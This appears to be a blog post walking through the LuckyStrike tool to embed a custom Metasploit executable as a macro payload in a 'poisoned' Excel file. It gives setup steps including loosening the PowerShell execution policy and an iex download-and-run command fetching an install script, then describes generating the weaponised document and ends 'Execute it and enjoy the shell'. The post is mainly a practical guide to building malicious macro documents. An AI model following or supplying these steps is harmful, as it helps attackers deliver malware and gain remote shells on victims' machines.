LuckyStrike and custom Metasploit loader

Lucky Strike is awesome.  So I wanted to share my findings from experiments I have made.

LUCKY STRIKE, GIRL IN RED

LUCKY STRIKE, GIRL IN RED

TL:DR – LuckyStrike is an Excel file generator that will create an Excel file with a custom executable payload embedded as a macro. It has other features as well, but I was only interested in the custom EXE file insertion.

The Github for LuckyStrike is here https://github.com/Shellntel/luckystrike

Greetings to curi0usJack

Software I have used :

So first we need to prepare the LuckyStrike environment… In Windows 10 (64bit) you need to enable this for Power Shell environment:

(Run Windows PowerShell ISE with admin privileges and set the execution policy ; execute it from some directory where you expect to have the LuckyStrike directory)

Set-ExecutionPolicy RemoteSigned

powershell-policyNext we install the LuckyStrike as suggested by the author

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Shellntel/luckystrike/master/install.ps1')

Accept all options and allow the PSSQLite module  installation.

We are ready to start Lucky Strike. Goto the dir where your LuckyStrike is and execute the PowerShell script

./luckystrike.ps1

ls-01Next we need to create a payload template to use in our poisoned Excel documents.

ls-02Next we add a new payload to the catalogue.

ls-03Add the generated EXE via https://astr0baby.wordpress.com/2016/09/23/john-connor-vs-eset-hey-eset-choose-some-other-mascot-not-a-cyborg/ 

Make sure you type the C: with CAPITAL case, lower case for some reason always failed :)

ls-04Select the new payload template to be used for the Excel file and choose the infection method – “Save To Disk”

ls-05Now generate the Excel with the selected custom payload.

Poisoned Excel is ready in the luckystrike\payloads directory

Execute it and enjoy the shell ;)

Attached is the video recording of the above


 

 

 

 

 

 

 

 

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s